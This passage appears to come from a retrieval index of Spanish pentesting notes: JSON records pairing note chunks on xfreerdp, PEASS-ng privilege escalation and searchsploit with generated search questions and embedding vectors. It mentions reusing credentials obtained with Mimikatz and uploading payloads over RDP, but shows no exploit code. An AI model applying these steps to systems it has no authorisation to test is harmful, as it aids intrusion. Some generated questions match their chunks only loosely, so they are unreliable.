-0.09056, 0.0451, -0.02599, -0.13035, -0.12367, 0.02264, 0.01831, -0.07369, -0.11831, -0.00887, 0.02861, -0.02638, -0.05948, -0.00343, -0.01347, 0.03797, -0.01248, 0.02403, 0.12639, 0.03633, 0.04296, 0.03163, -0.00239, -0.07315, -0.05428, -0.04148, -0.04171, -0.06642, -0.10777, 0.01459, 0.05254, 0.01271, 0.11805, -0.06104, 0.05732, 0.02889, 0.05407, -0.15458, 0.05756, -0.12535, 0.01721, -0.0212, -0.04806, -0.03792, 0.12954, 0.03246, 0.06477, 0.0474, -0.04157, 0.0005, 0.05926, 0.02384, 0.04897, -0.00615, -0.02962, -0.02443, -0.00191, -0.0166, 0.02653, 0.06242, -0.02487, -0.04216, 0.08525, -0.05567, -0.12779, 0.056, 0.02318, -0.04555, -0.0249, -0.03616, -0.02688, -0.02081, -0.00464, -0.06995, -0.05185, -0.01032, -0.06721, -0.02706, -0.01001, 0.01873, 0.05119, 0.06978, 0.0526, -0.0063, 0.03803, 0.00195, -0.02294, 0.07278, 0.01644, 0.01615, -0.05257, -0.00483, 0.01523, -0.00741, -0.05976, 0.04431, 0.00015, -0.09302, 0.0188, 0.05873, -0.01289, 0.03868, 0.01887, 0.00128, -0.07144, -0.07797, -0.02541, 0.0114, 0.02922, 0.00188, -0.02452, -0.04471, 0.04652, 0.01754, 0.05871, 0.02702, 0.0773, -0.01758, 0.08654, 0.03571, 0.06361, -0.03361, 0.03331, -0.06516, -0.06804, 0.04323, 0.04831, 0.00113, -0.00777, -0.01342, -0.04474, -0.01296, 0.03649, -0.00031, -0.0211, 0.01912, 0.0301, -0.05271, 0.03615, -0.0268, -0.0579, 0.00112, 0.04329, 0.07258, -0.05465, 0.04045, -0.02728]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "que programa sirve para hacer escritorio remoto desde Kali a Windows", "v": [0.01901, -0.02305, -0.07098, -0.17036, 0.05974, -0.16158, -0.00191, -0.06814, 0.00684, -0.11997, -0.03474, -0.20141, 0.01654, -0.13897, 0.04466, 0.08295, 0.04573, -0.01134, 0.07464, 0.07313, 0.05668, 0.00505, 0.02504, 0.02421, -0.04728, 0.0167, 0.12319, -0.03538, -0.06592, -0.02525, 0.02935, -0.0007, -0.00402, -0.15848, 0.04249, 0.00668, 0.02403, 0.09527, -0.02204, 0.08052, 0.09647, 0.13508, -0.01849, 0.0365, 0.04302, 0.00847, 0.18032, -0.06985, 0.07843, 0.05472, -0.0373, -0.07481, 0.04567, -0.00773, 0.09315, -0.06269, 0.10924, -0.12844, -0.05418, -0.01212, -0.02226, 0.01204, -0.00936, -0.0371, -0.00483, -0.04189, 0.02474, -0.02119, -0.07311, 0.10059, -0.13253, -0.0456, 0.11916, -0.05775, -0.04005, 0.01545, -0.12617, -0.05824, 0.0959, -0.06063, -0.00846, 0.04304, -0.02651, -0.04096, -0.13891, -0.19341, 0.02803, -0.02024, -0.03277, -0.05963, 0.06939, -0.00984, -0.05697, 0.09377, 0.13487, -0.04969, 0.07188, -0.01909, -0.01518, 0.08753, 0.03819, -0.0923, -0.03096, 0.0645, -0.06336, 0.11776, 0.02182, -0.02948, -0.06618, -0.01367, 0.02406, 0.04642, -0.06965, -0.03067, -0.0815, -0.00711, 0.01394, -0.05308, 0.07061, -0.01002, -0.08157, 0.0441, -0.08375, 0.02728, 0.01074, -0.07959, -0.01751, 0.08376, -0.05555, 0.11008, 0.06556, -0.00969, -0.08242, -0.04248, -0.07227, -0.02545, -0.0255, -0.07682, 0.01676, -0.08874, 0.1088, 0.10211, 0.0509, 0.01953, -0.02533, -0.00651, 0.07601, 0.04327, -0.00183, 0.00782, 0.07174, -0.03489, -0.00574, 0.01016, -0.07967, -0.06856, 0.01947, 0.08919, -0.03331, 0.04719, -0.01185, 0.00466, 0.03449, -0.02612, 0.08123, -0.0235, -0.03423, 0.01494, 0.07246, 0.07342, -0.10822, 0.09652, 0.03961, -0.09788, -0.0452, 0.00597, 0.06507, -0.02582, -0.01537, -0.00416, -0.14703, 0.0438, 0.03203, -0.01381, 0.019, 0.05722, -0.02423, 0.03469, -0.02137, -0.01786, -0.08134, -0.02014, 0.00227, -0.04389, 0.02775, -0.01116, -0.05422, -0.01007, 0.08051, 0.00102, -0.05072, -0.01809, 0.02397, -0.0411, 0.08334, 0.07141, -0.02895, 0.0361, 0.05864, 0.1331, -0.02606, -0.02441, 0.04816, 0.03056, -0.03141, -0.06573, 0.03925, -0.03784, 0.0522, 0.02194, 0.01078, -0.04352, 0.00531, 0.03581, 0.00971, -0.04113, -0.02887, 0.00365, 0.01542, -0.02148, 0.02461, -0.006, 0.05515, -0.02021, 0.01568, -0.01754, 0.01362, -0.0478, -0.02239, -0.04647, -0.09253, 0.0494, -0.00732, -0.07668, -0.06603, -0.03436, -0.02925, 0.00535, -0.00937, -0.01872, -0.03347, 0.00134, 0.0403, -0.02532, -0.0429, 0.05248]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "con que puedo copiar y pegar entre dos computadoras remotas", "v": [0.23988, 0.04195, -0.08647, -0.04684, 0.04322, -0.16941, 0.16311, 0.13176, -0.05602, -0.09386, 0.00498, -0.03599, 0.06454, 0.00302, 0.07115, 0.0569, -0.00783, 0.07865, 0.04121, 0.00557, 0.12431, -0.05785, 0.04297, -0.017, 0.00466, 0.04598, 0.07877, 0.06336, -0.06347, -0.0394, 0.00792, 0.01232, 0.08295, -0.06257, -0.09422, -0.04107, 0.01322, 0.0427, 0.05053, -0.03656, 0.10247, 0.10244, -0.18538, -0.05921, 0.09514, -0.04227, -0.00425, -0.03982, -0.02634, -0.03489, -0.05291, -0.03007, -0.06476, -0.11912, -0.11426, -0.01106, 0.18571, -0.03688, 0.11634, 0.02587, -0.05984, 0.10224, -0.05636, -0.02623, 0.02703, 0.01646, -0.053, -0.07804, -0.14458, 0.06544, -0.03308, 0.11867, 0.03151, -0.07501, 0.03899, 0.04948, -0.11439, -0.08158, 0.0788, 0.03343, -0.03727, -0.09984, -0.06504, 0.01362, -0.0744, -0.14522, -0.01298, 0.01177, -0.04474, -0.03273, 0.08368, 0.05471, -0.01309, 0.05094, 0.06667, -0.04581, 0.02096, 0.07426, -0.05878, 0.02048, 0.04899, 0.04271, -0.04697, 0.1253, -0.13112, 0.09212, 0.09626, -0.0209, 0.0384, -0.0945, 0.04454, 0.02301, -0.07409, 0.00014, -0.14713, -0.05227, -0.0142, -0.02003, 0.01592, 0.00546, -0.04061, 0.02048, -0.01423, -0.01421, 0.01184, -0.02529, 0.04508, 0.08254, -0.07767, -0.10182, 0.03965, -0.01149, 0.00135, -0.00656, -0.0069, 0.01189, -0.10632, -0.09816, -0.002, -0.12291, 0.0193, 0.10072, -0.05763, -0.03144, 0.0063, 0.08526, 0.06617, -0.03442, -0.09781, -0.03637, -0.01666, -0.0255, -0.01297, 0.02435, -0.0384, 0.07914, -0.00634, -0.00474, -0.03483, 0.06914, -0.07335, 0.05275, 0.02592, -0.0547, -0.01772, -0.02146, -0.05218, -0.0413, 0.06789, 0.03307, -0.11844, 0.01261, -0.04055, -0.06635, -0.00562, -0.03028, 0.035, -0.00116, -0.02495, -0.0292, -0.06521, 0.10795, -0.03401, -0.02806, -0.03065, 0.04215, -0.03931, 0.06494, -0.02854, 0.02612, 0.04285, 0.00404, 0.01259, 0.02074, 0.02608, -0.03239, -0.01005, 0.05429, 0.04635, 0.00487, -0.05463, 0.00673, -0.13282, -0.01747, 0.0586, 0.0359, -0.04119, 0.02731, -0.03085, 0.03649, -0.02305, -0.04761, 0.0151, -0.0451, -0.0648, -0.03853, 0.00358, -0.03712, 0.01348, -0.01099, 0.04864, 0.0346, 0.08772, 0.01608, 0.04139, 0.00877, 0.06453, 0.05639, -0.0001, -0.03855, -0.02017, 0.04799, -0.01917, -0.02354, 0.01532, 0.03305, 0.0046, -0.05022, -0.04019, 0.03302, -0.00059, 0.06837, -0.01768, -0.0871, -0.00679, -0.00675, -0.11449, 0.00434, -0.00433, -0.07584, -0.04837, 0.01525, 0.02214, -0.02239, -0.00995, 0.03421]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# RDP\n\n> Escritorio remoto Windows (3389). **Acceso legΓ­timo** con credenciales: no necesita Reverse shell.\n\n```bash\nxfreerdp /u:student /p:lab /v:IP /cert:ignore /clipboard\nxfreerdp3 ... # si la versiΓ³n nueva\n```\n- `/clipboard` = **copiar-pegar entre Kali y Windows** (clave para subir scripts/payloads).\n- `/cert:ignore` = no protestar por el certificado del lab.", "indexar": "cual es la mejor opcion libre para conectar mi computadora con otra sin configurar puertos manualmente", "v": [0.26232, 0.1298, -0.13281, -0.05619, 0.0505, -0.17577, 0.09205, -0.0337, -0.15274, -0.13834, -0.1222, -0.04638, 0.02082, -0.02102, 0.00205, -0.02268, 0.06357, -0.04818, 0.07739, -0.01609, -0.01796, -0.05833, -0.014, -0.03999, 0.03716, -0.00345, 0.1028, -0.00173, -0.15406, -0.04844, 0.03602, 0.02491, 0.14557, 0.01352, 0.04994, -0.04334, -0.00961, 0.05153, 0.09512, 0.01687, 0.06556, 0.08733, -0.04539, 0.11075, 0.16089, -0.05211, 0.04426, -0.01509, 0.00607, -0.03688, -0.06083, 0.01866, -0.08506, -0.07106, -0.0228, -0.02678, 0.17361, -0.08483, 0.1077, -0.06809, -0.00318, 0.12227, -0.03413, 0.00256, -0.00658, 0.05959, -0.06297, -0.06075, -0.07599, 0.08536, 0.00797, 0.05859, -0.01835, 0.00546, 0.07365, 0.06645, 0.01294, -0.01329, 0.18951, 0.04995, 0.02425, -0.09118, -0.06269, 0.02764, -0.10524, -0.10313, -0.02199, -0.04762, 0.02795, -0.05039, 0.09142, -0.05669, -0.04486, 0.06149, 0.09272, -0.05446, 0.07554, 0.08759, -0.04182, 0.07634, 0.13375, 0.03372, -0.07058, 0.16068, -0.03663, 0.02192, 0.05078, -0.03583, 0.02787, -0.03787, 0.07762, 0.02073, 0.0041, -0.02542, -0.06848, -0.05947, -0.02218, -0.07219, -0.01388, 0.01084, -0.06357, -0.05497, -3e-05, -0.02123, -0.02599, 0.05529, 0.04764, 0.11574, -0.01999, 0.00272, 0.05496, -0.0821, -0.01324, -0.09557, -0.09552, 0.02308, -0.01487, -0.10909, -0.04131, -0.07116, 0.00707, 0.08632, -0.0168, -0.06294, 0.06752, 0.02085, 0.0073, -0.04174, -0.05368, -0.00636, -0.00267, 0.04267, 0.00384, 0.0452, -0.00128, 0.08621, 0.0563, 0.00754, -0.04351, 0.08126, -0.01363, 0.02061, 0.02891, -0.00385, 0.0161, -0.01887, -0.09036, 0.00016, 0.05649, 0.01618, -0.07756, 0.05292, -0.04289, -0.05716, -0.01293, -0.03092, 0.02602, -0.01867, 0.01977, -0.01624, -0.02444, 0.07129, -0.01375, -0.08115, -0.09607, -0.0288, -0.0302, -0.02122, 0.00509, 0.04626, -0.00825, 0.01433, -0.07239, 0.00473, 0.05852, -0.01784, -0.05776, -0.04137, -0.01608, 0.01386, -0.01663, 0.02537, -0.0257, -0.02565, 0.08326, 0.11239, -0.06942, 5e-05, 0.02279, 0.07597, 0.00951, -0.05783, 0.0719, -0.02917, -0.05218, 0.01312, 0.0367, -0.04003, 0.02315, 0.0305, 0.03623, -0.00712, 0.05392, -0.02561, 0.0129, -0.00079, 0.04048, 0.05931, 0.01316, 0.02487, -0.05255, 0.0293, -0.01846, -0.0499, 0.02758, 0.04947, 0.02921, -0.02249, -0.0363, 0.00656, 0.07117, 0.04828, -0.00182, -0.09566, 0.00359, -0.03918, -0.10579, 0.01448, -0.00705, -0.05207, -0.04357, 0.02935, 0.01715, -0.04019, -0.00034, -0.01067]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "quΓ© herramienta me permite montar un entorno cΓ³modo de Privesc en Windows?", "v": [-0.07168, 0.10904, -0.26285, -0.19502, -0.066, -0.01119, -0.09465, -0.0633, -0.09223, -0.26783, 0.00298, 0.0823, 0.0511, -0.11154, 0.05244, 0.11615, 0.07555, -0.16291, -0.00124, 0.13947, -0.0432, -0.05906, -0.08781, -0.04552, 0.0015, 0.01798, 0.09094, -0.02243, -0.1857, 0.08601, 0.03253, 0.14916, -0.02045, 0.02147, -0.08268, -0.10365, 0.01601, 0.0347, 0.04252, -0.01342, 0.04816, 0.04004, 0.00025, 0.12012, 0.12717, -0.01188, -0.00389, -0.03139, -0.00919, 0.02123, -0.02714, -0.12081, -0.02847, -0.06539, 0.0507, -0.08849, 0.17534, -0.02895, 0.15209, -0.07482, -0.14108, 0.13095, -0.04352, 0.13354, 0.01967, -0.09504, 0.04044, -0.0028, -0.05896, 0.01797, -0.01764, -0.09783, 0.08121, 0.00567, -0.01471, -0.00962, -0.04976, -0.01228, 0.10386, 0.01644, 0.10651, 0.03159, -0.01389, -0.02654, -0.04961, -0.11298, 0.04982, -0.01589, 0.02512, -0.03524, 0.03562, -0.02218, -0.03761, 0.03385, 0.03956, -0.10099, 0.04289, 0.08261, 0.01702, 0.0145, 0.05033, -0.03863, -0.0732, 0.05831, 0.02276, 0.0094, -0.0613, -0.10845, -0.09215, -0.0441, 0.07151, 0.09739, -0.04325, 0.01186, -0.02154, -0.01695, -0.01904, -0.03318, -0.04226, -0.05827, -0.01317, 0.06018, -0.05211, -0.05863, -0.00653, -0.00742, -0.00572, 0.09158, -0.06209, -0.01744, 0.01739, -0.0536, -0.04196, 0.00695, -0.05077, 0.02587, -0.02778, -0.07574, 0.01988, -0.09578, 0.09825, 0.00456, 0.00636, -0.06766, 0.00932, 0.04518, 0.0327, -0.04451, 0.005, 0.03326, 0.03097, 0.03023, 0.01591, -0.0306, -0.06658, 0.00825, -0.01014, 0.07442, 0.00389, 0.00666, -0.0011, -0.02613, -0.01798, -0.03103, -0.00173, -0.07568, 0.02902, -0.01532, 0.07159, 0.03438, -0.04488, 0.03652, 0.02413, -0.0109, 0.02275, -0.01116, -0.00596, 0.00881, -0.03863, -0.02031, -0.10835, 0.02595, 0.01193, -0.06425, -0.01068, -0.01418, 0.0267, 0.01518, -0.02325, 0.03805, -0.05007, 0.05899, 0.06525, -0.06177, 0.05751, -0.01554, -0.05421, -0.04275, 0.03232, -0.01874, -0.03618, 0.00577, 0.00095, -0.06261, 0.07167, 0.02832, -0.01576, 0.02243, 0.02479, 0.04896, 0.05288, 0.00691, 0.03213, -0.03842, 0.0007, 0.00212, 0.02132, -0.01646, -0.02252, -0.00693, 0.02225, -0.00476, 0.08082, -0.02439, -0.01536, 0.01526, -0.03718, 0.02229, -0.00183, -0.0179, 0.02538, 0.00335, -0.04037, -0.00617, 0.02489, -0.04091, 0.03959, -0.02203, -0.0512, -0.02467, -0.00667, 0.07035, 0.00629, -0.07409, -0.05442, -0.04127, 0.00585, 0.02415, -0.05241, -0.09118, -0.02858, -0.04158, 0.03139, -0.07792, -0.0328, 0.01584]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "con quΓ© programa puedo ejecutar PEASS-ng de forma sencilla?", "v": [-0.07532, 0.00827, -0.10371, -0.0186, 0.07703, 0.00407, 0.13749, -0.18754, -0.16364, -0.07288, -0.13043, 0.18768, -0.06193, -0.17537, 0.12443, -0.02948, 0.06177, -0.02745, 0.09575, 0.0849, 0.00904, -0.07442, -0.11239, -0.03176, 0.02954, 0.21373, 0.08597, 0.08356, -0.07397, -0.08786, -0.04514, 0.06706, -0.01542, -0.14171, 0.01344, 0.06548, 0.00179, 0.08742, 0.03757, 0.10427, -0.07539, 0.0924, -0.00778, 0.0747, -0.02694, 0.03925, 0.09058, 0.0069, 0.04895, -0.01015, 0.00935, 0.04952, -0.07405, 0.00615, 0.03594, -0.01013, 0.02329, -0.17246, -0.10939, -0.00489, 0.01596, 0.01004, 0.03661, -0.08558, 0.10979, 0.02333, 0.11841, -0.00015, 0.04907, 0.03483, 0.00461, -0.00876, 0.03574, 0.03768, -0.032, 0.00146, -0.12753, -0.01712, 0.00812, -0.0062, 0.01977, 0.01461, -0.00854, 0.05265, 0.00068, 0.02827, -0.11702, -0.11271, -0.06125, -0.06533, 0.04325, -0.01287, 0.04222, 0.12877, 0.02012, 0.0085, 0.02314, 0.05885, -0.04129, 0.04726, -0.03048, -0.07348, -0.08934, 0.09472, -0.04359, 0.02542, 0.01051, 0.06744, -0.0532, -0.00502, 0.0408, 0.01388, -0.11595, -0.0592, -0.08301, 0.00717, -0.05491, -0.02188, 0.032, -0.09822, -0.06053, 0.07127, -0.02618, -0.00209, 0.10831, -0.03412, -0.02301, 0.16038, -0.03207, 0.06949, 0.04015, 0.01244, 0.01592, -0.03489, -0.0086, -0.00677, 0.03207, -0.09673, 0.01162, -0.07118, 0.0485, 0.01114, 0.00711, -0.02311, 0.03055, -0.09076, 0.08915, -0.07078, 0.02345, 0.0647, 0.06814, -0.03388, -0.03493, 0.03637, -0.054, -0.04146, 0.04326, 0.05325, -0.01545, 0.08865, -0.0172, 0.01621, -0.04661, -0.07913, 0.06639, -0.02653, 0.04428, 0.02423, 0.00278, 0.07313, 0.00269, 0.03741, 0.03223, -0.04276, -0.01835, -0.06206, -0.05943, -0.01928, -0.00743, 0.00039, -0.09821, 0.04731, 0.02894, 0.05038, -0.02748, -0.04116, -0.0822, 0.05664, -0.00839, -0.04456, -0.03005, 0.05181, -0.03573, -0.06349, 0.01932, -0.00024, 0.00033, -0.00386, -0.03017, -0.04932, -0.03711, -0.04757, 0.02264, 0.00042, 0.04761, 0.12022, -0.07708, 0.03771, 0.00195, 0.08893, 0.00487, -0.05352, 0.08751, -0.00716, -0.00306, 0.01865, -0.01414, 0.07226, 0.07765, 0.0822, -0.06453, 0.0068, 0.10815, 0.01198, 0.01664, -0.09475, -0.00993, 0.02769, -0.03141, -0.03236, -0.03403, -0.07104, 0.00738, -0.03484, 0.03186, 0.00044, -0.05621, -0.04071, -0.00531, -0.02938, 0.03223, 0.09902, 0.01421, -0.02159, -0.02831, -0.01646, -0.0357, 0.02561, -0.03305, 0.0067, -0.02807, 0.02543, 0.0258, -0.07639, 0.00236, 0.00616]} -{"tipo": "pregunta", "herramienta": "RDP", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/RDP.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "## CuΓ‘ndo\n- Cuando consigues credenciales vΓ‘lidas (reutilizaciΓ³n, Mimikatz, GPP cpassword) y la mΓ‘quina expone 3389.\n- GUI cΓ³moda para Privesc Windows y para ejecutar PEASS-ng.\n\nRelacionado: SMB Β· Movimiento lateral Β· OSCP MOC", "indexar": "cuΓ‘l es una alternativa gratuita para obtener credenciales con GUI en sistemas Windows?", "v": [-0.16371, 0.06639, -0.04936, -0.08449, 0.11228, -0.11183, -0.12348, -0.07494, -0.07674, -0.11714, -0.02824, -0.09719, -0.0758, -0.0193, 0.03355, -0.01172, 0.00848, -0.05913, 0.05223, 0.03906, -0.02977, -0.05783, -0.06227, -0.06934, -0.10525, 0.00039, -0.00793, -0.087, 0.00355, 0.10915, 0.07434, -0.05528, -0.0041, -0.10823, -0.18799, 0.04711, -0.03951, 0.12907, 0.09683, 0.02936, 0.05182, 0.02052, 0.01834, 0.10285, 0.11122, -0.14617, 0.05025, 0.01373, 0.03041, -0.07778, -0.09311, -0.08237, -0.06421, -0.07994, 0.09701, -0.13101, 0.16106, -0.14836, -0.01654, -0.06772, -0.03481, 0.14377, 0.02923, 0.09238, 0.01209, 0.01758, -0.02955, -0.07053, -0.04683, 0.12695, -0.02024, -0.05497, 0.06616, 0.0111, -0.05568, 0.02834, -0.08003, -0.03232, 0.09617, 0.05556, 0.14555, 0.03078, 0.03073, 0.01472, 0.02274, -0.10642, -0.06737, -0.08439, 0.00047, -0.04226, 0.09623, -0.05008, -0.01959, 0.13262, 0.00564, -0.09896, -0.04646, 0.00719, -0.08606, 0.10691, -0.02941, -0.11733, -0.13157, 0.0948, -0.02732, -0.00489, 0.00207, -0.01745, -0.08763, -0.05746, 0.03212, 0.05529, -0.02505, 0.0648, -0.04064, -0.00775, 0.0606, -0.02899, -0.03269, 0.01798, -0.04812, 0.01137, -0.08729, -0.0605, -0.00173, 0.06803, -0.01707, 0.11149, -0.05294, 0.00173, 0.06209, -0.05528, -0.02468, -0.03309, -0.11029, -0.00568, 0.03998, -0.03588, 0.00188, -0.03557, 0.01456, 0.07227, 0.04419, -0.05397, 0.00203, -0.02613, 0.09799, -0.04882, 0.03586, -0.12818, -0.02917, 0.02653, -0.057, 0.01709, -0.02089, 0.01598, 0.03138, 0.07412, -0.03213, 0.00259, 0.04859, -0.04291, -0.04051, 0.01121, -0.02407, -0.03655, -0.01931, 0.01149, 0.01328, 0.04131, 0.0124, 0.11162, -0.03949, -0.06076, 0.03245, 0.00428, 0.04923, -0.07449, -0.04253, -0.0599, -0.03924, 0.05665, -0.00329, -0.05081, -0.0194, -0.00239, -0.0434, 0.07601, -0.02031, 0.02344, -0.01916, 0.0278, -0.00033, -0.05767, 0.03038, -0.00462, 0.02829, -0.08681, -0.07272, 0.05699, -0.10305, 0.01332, -0.00121, -0.07244, 0.10357, 0.04655, -0.00821, 0.07496, 0.07501, 0.06839, 0.012, 0.01553, 0.02928, -0.0959, -0.05478, -0.04509, 0.01584, 0.00565, 0.00819, -0.05566, -8e-05, 0.01782, 0.01608, 0.04022, 0.00615, -0.01506, -0.043, 0.05612, -0.04892, -0.01105, 0.05595, -0.0152, 0.05218, 0.01981, 0.00814, 0.01575, 0.00675, 0.00474, -0.0065, -0.03365, -0.01185, 0.0815, -0.01552, -0.04851, -0.09457, -0.04215, -0.05172, -0.03261, 0.01297, -0.05137, -0.04711, 0.0426, 0.02857, 0.00174, -0.00401, 0.04324]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "ΒΏquΓ© programa sirve para buscar exploits offline?", "v": [-0.09586, 0.10466, -0.16582, -0.13801, 0.02547, -0.15866, -0.04386, -0.03759, -0.01076, -0.0988, -0.02304, -0.13072, 2e-05, 0.01482, -0.03973, -0.10298, 0.10518, 0.00083, 0.10978, 0.04077, -0.02992, 0.10638, 0.04243, -0.10382, -0.0422, 0.00149, 0.0204, -0.02225, -0.12343, -0.07094, -0.05121, -0.01634, 0.04344, -0.10825, 0.02843, -0.01406, 0.12463, -0.05755, 0.04235, 0.03785, 0.09849, -0.00547, -0.14004, 0.01236, 0.12997, 0.00342, -0.03463, 0.01419, -0.0642, 0.04389, -0.05009, -0.07316, -0.05186, -0.00727, 0.0541, -0.08679, 0.01053, -0.16435, 0.0191, -0.01495, -0.09766, -0.17215, 0.03141, -0.13503, 0.09212, -0.09226, 0.11116, 0.08016, -0.15061, 0.10753, -0.05937, 0.03838, 0.08043, 0.00281, -0.02505, -0.00025, 0.05115, 0.01653, 0.03449, 0.00201, -0.03665, 0.01092, 0.0085, 0.07933, -0.08382, -0.00392, 0.07723, 0.02497, -0.05999, -0.03804, -0.02019, 0.1019, -0.02955, -0.00667, -0.01934, -0.0959, 0.14207, -0.04995, 0.05157, 0.10267, -0.04986, -0.09891, -0.11043, 0.01179, -0.09672, 0.07934, 0.02337, -0.0023, -0.10717, 0.08413, 0.02084, -0.05208, -0.04282, 0.05933, 0.01951, 0.08565, -0.01483, -0.07372, 0.07001, -0.00776, -0.11771, 0.10152, -0.05275, 0.02655, 0.12191, 0.00484, -0.03508, 0.05234, 0.00372, 0.004, 0.01756, -0.00942, 0.01642, -0.01726, -0.10262, -0.14097, 0.08006, -0.02945, 0.02987, -0.06555, 0.06988, -0.0001, -0.03254, -0.01592, 0.03703, 0.01295, 0.08431, -0.04716, 0.00181, -0.06981, -0.01888, -0.01132, -0.07792, 0.03428, -0.05413, -0.03898, 0.01529, -0.03182, -0.08277, 0.06267, -0.01809, -0.02338, 0.01164, -0.0434, 0.00721, -0.04845, -0.00719, -0.007, 0.02683, 0.07148, 0.00521, 0.0816, 0.04684, -0.15648, -0.01757, -0.00796, 0.02162, -0.05567, 0.05619, -0.00354, -0.06775, -0.02989, 0.09092, 0.04191, -0.0037, -0.01909, 0.04117, -0.01819, -0.00869, -0.06246, 0.03837, -0.05255, -0.05177, 0.05041, 0.00429, 0.00948, 0.01841, 0.05201, 0.04303, -0.11079, -0.05642, -0.06035, -0.00209, 0.00777, 0.02965, 0.05226, 0.01958, -0.04728, 0.00294, 0.06675, -0.06524, -0.00919, 0.02443, -0.02557, -0.05374, -0.03184, -0.04305, 0.0237, 0.03072, 0.00304, -0.05417, -0.01977, -0.01595, 0.07547, 0.01358, 0.02171, 0.01226, -0.02696, -0.04306, -0.05385, 0.02469, -0.06149, 0.01211, 0.01206, -0.01863, -0.1128, 0.02725, 0.06351, -0.06057, -0.03197, -0.04822, 0.04457, 0.046, 0.00842, -0.05183, 0.009, -0.04568, -0.00299, -0.02741, 0.00171, -0.07237, -0.00897, -0.01366, 0.01798, 0.05632, 0.06235]} -{"tipo": "pregunta", "herramienta": "searchsploit", "perfil": "PENTESTERS", "fichero": "conocimiento/01 - Enumeracion/searchsploit.md", "tema": "enumeracion", "fuente": null, "licencia": null, "texto": "# searchsploit\n\n> Buscador **offline** de Exploit-DB. El puente entre `nmap -sV` y la explotaciΓ³n. Copia local en `tu carpeta` (symlink en `tu carpeta`).", "indexar": "cual es una alternativa a Exploit-DB que funciona sin internet?", "v": [-0.13375, 0.0806, -0.11181, -0.03763, -0.05237, -0.11617, -0.09335, -0.0498, -0.12546, 0.01237, -0.01933, -0.28867, -0.05867, 0.00885, 0.04598, -0.17104, 0.04227, -0.09362, 0.04833, -0.20208, 0.01857, 0.00479, -0.04409, -0.06432, -0.06681, 0.00384, -0.19203, 0.15125, -0.08256, 0.10348, -0.00884, -0.06624, 0.11395, -0.01819, -0.06788, 0.03907, 0.11502, 0.13851, 0.18909, -0.01612, 0.01729, -0.05361, -0.11463, 0.0775, 0.06043, 0.03741, -0.00159, -0.11522, -0.01538, -0.00875, -0.14581, 0.04516, -0.13086, -0.03296, -0.01081, -0.06987, 0.1258, -0.15054, 0.06045, 0.00557, -0.08702, -0.05767, -0.05149, -0.04983, 0.01991, 0.00698, 0.01113, -0.00295, -0.05581, 0.13472, 0.02879, 0.09583, -0.00415, -0.03016, 0.00284, 0.0039, 0.0298, -0.04083, 0.01634, 0.07523, 0.04121, 0.03831, 0.00251, 0.05897, -0.10055, -0.07419, 0.02575, -0.08879, -0.03106, -0.0212, -0.00512, 0.06806, 0.01389, 0.04602, -0.00437, -0.11306, 0.02552, -0.01344, -0.0111, -0.03344, 0.04223, 0.12294, -0.12163, 0.10127, -0.03419, -0.0071, 0.0075, 0.08443, -0.09445, -0.05591, 0.04058, -0.04791, -0.0537, -0.03167, 0.03291, -0.04691, -0.02211, -0.0602, -0.04542, 0.00484, -0.08546, -0.00277, 0.0031, -0.09649, 0.05859, 0.05648, 0.08418, -0.02624, -0.01093, 0.01487, 0.03703, -0.09007, 0.00134, -0.06963, -0.05813, -0.06505, 0.04106, -0.06347, 0.00162, -0.00681, 0.0663, -0.05738, -0.03908, -0.02824, 0.00894, -0.06842, 0.04579, -0.00608, -0.02388, -0.01816, -0.07295, -0.00094, -0.01483, 0.05288, -0.05524, 0.01032, -0.05518, 0.07877, -0.07278, 0.06838, 0.0171, -0.03154, 0.05777, 0.0343, -0.03954, -0.00101, -0.07759, -0.00798, -0.02469, -0.03339, 0.00062, 0.03249, 0.05996, -0.07232, -0.01473, -0.02773, -0.04367, -0.02119, 0.04975, 0.01938, -0.02577, 